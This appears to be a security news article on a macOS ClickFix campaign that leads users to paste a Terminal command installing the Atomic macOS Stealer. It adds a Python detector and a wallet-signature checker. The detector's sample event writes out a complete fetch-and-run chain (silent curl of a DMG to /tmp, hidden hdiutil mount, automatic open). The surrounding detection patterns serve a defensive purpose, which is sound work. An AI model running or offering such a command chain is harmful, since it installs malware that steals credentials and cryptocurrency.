A new ClickFix variant is going after macOS, and the clever part is that most of the dirty work runs through tools already shipped with the system. Researchers at Unit 42 (Palo Alto Networks) documented the campaign, which ends with Atomic macOS Stealer, better known as AMOS, on the victim’s machine.
How the trick works
It starts with a fake page that mimics a CAPTCHA check. Instead of ticking the usual box, the site tells you to open Terminal and paste a command to “complete verification.” That command is the trap.
What you run downloads a DMG file with curl using the -fsSL flags (quiet mode, no progress bar, no messages), saves it to /tmp under a random name, and then runs:
hdiutil attach -nobrowse
The -nobrowse flag mounts the disk image without showing it in Finder, so no new volume appears on the desktop or in the sidebar. The script walks up to three directory levels inside the image looking for a .app or .pkg, and once it finds one, it launches it with the macOS open command. Fully automatic, no further clicks from you.
In the analyzed case, the DMG was named s.01M0td.dmg and contained NNApp.app, a self-signed bundle. The command-and-control infrastructure included the domain svs-verificationdate[.]beer and the IP 196.251.107[.]171.
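As an added illustration (not code from Unit 42 or BleepingComputer), here is a small Python detector that looks for the building blocks described above in process-execution logs: a silent curl download of a DMG into /tmp, an hdiutil attach with -nobrowse, and an open of an .app or .pkg, chained in one command line. The ProcEvent record, the indicator names and the sample command lines are constructed for the example; a real deployment would feed it the command lines your endpoint agent actually records.

```python
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    """One process-execution record as an endpoint agent might log it (constructed shape)."""
    parent: str    # name of the parent process (e.g. Terminal)
    cmdline: str   # full command line that was executed


# Constructed sample events for illustration; not taken from the Unit 42 report.
# The first imitates the chain described in the article (silent curl of a DMG into
# /tmp, hidden mount, automatic open); the rest are everyday admin activity.
SAMPLES = [
    ProcEvent("Terminal",
              "curl -fsSL https://example.invalid/v.dmg -o /tmp/.x9 "
              "&& hdiutil attach -nobrowse /tmp/.x9 "
              "&& open /Volumes/Untitled/Example.app"),
    ProcEvent("Terminal", "hdiutil attach ~/Downloads/SomeTool.dmg"),
    ProcEvent("bash", "hdiutil attach -nobrowse /Users/ci/build/App.dmg"),
    ProcEvent("Terminal", "curl -fsSL https://example.invalid/notes.pdf -o ~/Downloads/notes.pdf"),
]

# Arguments of one command, up to the next shell operator (; | & and &&).
SEGMENT = r"[^;|&]*"


def indicators(cmdline):
    """Return the names of the ClickFix-style stages present in a command line."""
    found = []

    curl = re.search(r"\bcurl\b(" + SEGMENT + ")", cmdline)
    if curl:
        args = curl.group(1)
        # any short-option cluster containing 's' (e.g. -fsSL) means silent mode
        silent = any("s" in flags for flags in re.findall(r"(?<!\S)-([a-zA-Z]+)", args))
        if silent and (".dmg" in args or "/tmp/" in args):
            found.append("curl_silent_dmg_or_tmp")

    if re.search(r"\bhdiutil\s+attach\b" + SEGMENT + r"-nobrowse", cmdline):
        found.append("hdiutil_nobrowse")

    if re.search(r"\bopen\b" + SEGMENT + r"\.(app|pkg)\b", cmdline):
        found.append("open_bundle")

    return found


def classify(event):
    """Score one event: 'high' when a hidden mount is chained with another stage,
    'medium' for any two stages, 'low' for a single stage, 'none' otherwise."""
    found = indicators(event.cmdline)
    if "hdiutil_nobrowse" in found and len(found) >= 2:
        level = "high"
    elif len(found) >= 2:
        level = "medium"
    elif found:
        level = "low"
    else:
        level = "none"
    return level, found


def scan(events):
    """Return the events worth an analyst's attention (medium or high)."""
    hits = []
    for ev in events:
        level, found = classify(ev)
        if level in ("high", "medium"):
            hits.append({"parent": ev.parent, "level": level,
                         "indicators": found, "cmdline": ev.cmdline})
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLES):
        print(f"[{hit['level']}] parent={hit['parent']} "
              f"indicators={','.join(hit['indicators'])}\n    {hit['cmdline']}")
```

The scoring is deliberately conservative: a lone hdiutil -nobrowse (common in build scripts) only rates "low", while the full chain in one line rates "high". The parent process is carried along so an analyst can see whether the line came from an interactive Terminal, which is where ClickFix victims paste it.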
What AMOS steals
The payload is Atomic macOS Stealer, a hungry commercial infostealer. According to the analysis, it grabs:
- Credentials from eight Chromium-based browsers: Chrome, Edge, Brave, Opera, Arc, Vivaldi, CocCoc and Yandex.
- Data from Firefox-derived browsers: LibreWolf, SeaMonkey, Tor Browser, Waterfox and Zen Browser.
- Cryptocurrency wallets: Exodus, Electrum, Atomic Wallet, Wasabi, Bitcoin Core, Litecoin Core, DashCore, Guarda, Binance, Dogecoin and TonKeeper.
- Telegram Desktop and Discord data.
- Apple Keychain databases and Safari cookies.
- User documents in PDF, TXT and RTF format.
One detail stings if you hold crypto: AMOS replaces legitimate installs of Ledger Live and Trezor Suite with tampered versions built to drain hardware wallets.
Who it affects and what to do
There is no CVE here and no specific macOS bug to patch. The attack doesn’t exploit a flaw in the OS; it exploits the person at the keyboard. curl, hdiutil and open are normal, necessary utilities; the trouble is running them with arguments you don’t understand because a website told you to.
The fix is plain common sense and it holds up on its own: be suspicious any time a site asks you to open Terminal and paste a command. A real CAPTCHA never needs that. If you don’t fully understand what a command does, don’t run it. And if you use Ledger Live or Trezor Suite, download them only from the official sites and check that your install hasn’t been swapped out.
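On the last point, here is an added Python example (not from the article or from either wallet vendor) of how to check an installed Ledger Live or Trezor Suite bundle with macOS's codesign tool: it verifies the bundle's seal and then compares the TeamIdentifier and Authority chain with what you expect. The team IDs in EXPECTED_TEAM_IDS are placeholders to replace with the value from a download you trust, the bundle paths under /Applications are assumed, and the two sample codesign outputs are constructed.

```python
import os
import subprocess

# Placeholder team identifiers (assumption): take the real value from the vendor's
# documentation or from `codesign -dv --verbose=4` on a download you trust.
EXPECTED_TEAM_IDS = {
    "/Applications/Ledger Live.app": "LEDGER_TEAM_ID_PLACEHOLDER",
    "/Applications/Trezor Suite.app": "TREZOR_TEAM_ID_PLACEHOLDER",
}

# Constructed codesign output for two cases (not captured from real software):
# a vendor-signed bundle and a bundle re-signed with a self-signed certificate.
SAMPLE_VENDOR_SIGNED = """\
Executable=/Applications/Ledger Live.app/Contents/MacOS/Ledger Live
Identifier=com.example.ledgerlive
Format=app bundle with Mach-O universal (x86_64 arm64)
Authority=Developer ID Application: Example Vendor (LEDGER_TEAM_ID_PLACEHOLDER)
Authority=Developer ID Certification Authority
Authority=Apple Root CA
TeamIdentifier=LEDGER_TEAM_ID_PLACEHOLDER
"""

SAMPLE_SELF_SIGNED = """\
Executable=/Applications/Ledger Live.app/Contents/MacOS/Ledger Live
Identifier=com.example.ledgerlive
Format=app bundle with Mach-O thin (arm64)
Authority=Self Signed Dev
TeamIdentifier=not set
"""


def parse_codesign(text):
    """Pull the TeamIdentifier and Authority chain out of `codesign -dv --verbose=4` output."""
    team = None
    authorities = []
    for line in text.splitlines():
        key, sep, value = line.partition("=")
        if not sep:
            continue
        if key == "TeamIdentifier":
            team = value.strip()
        elif key == "Authority":
            authorities.append(value.strip())
    return {"team_id": team, "authorities": authorities}


def assess(parsed, expected_team):
    """Decide whether the signing identity matches what the vendor should have used."""
    if parsed["team_id"] in (None, "not set"):
        return "unsigned or self-signed: reinstall from the vendor's site"
    if parsed["team_id"] != expected_team:
        return "signed by an unexpected team: treat as replaced"
    if not any(a.startswith("Developer ID Application") for a in parsed["authorities"]):
        return "team matches but no Developer ID certificate in the chain"
    return "ok"


def check_app(path, expected_team):
    """Run codesign against an installed bundle and assess the result (macOS only)."""
    if not os.path.isdir(path):
        return "not installed"
    # --verify --deep --strict fails if any file in the bundle changed after signing
    verify = subprocess.run(["codesign", "--verify", "--deep", "--strict", path],
                            capture_output=True, text=True)
    if verify.returncode != 0:
        return "signature missing or broken: " + verify.stderr.strip()
    # codesign prints the signing details on stderr, not stdout
    info = subprocess.run(["codesign", "-dv", "--verbose=4", path],
                          capture_output=True, text=True)
    return assess(parse_codesign(info.stderr), expected_team)


if __name__ == "__main__":
    for app, team in EXPECTED_TEAM_IDS.items():
        print(f"{app}: {check_app(app, team)}")
```

A self-signed bundle like the one in this campaign reports TeamIdentifier as "not set", which is the first thing the check trips on; a bundle re-signed by someone else with a real developer certificate is caught by the team-ID comparison instead, which is why a known-good team ID matters more than the mere presence of a signature.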
Source
New macOS ClickFix attack silently mounts DMGs to push infostealer — BleepingComputer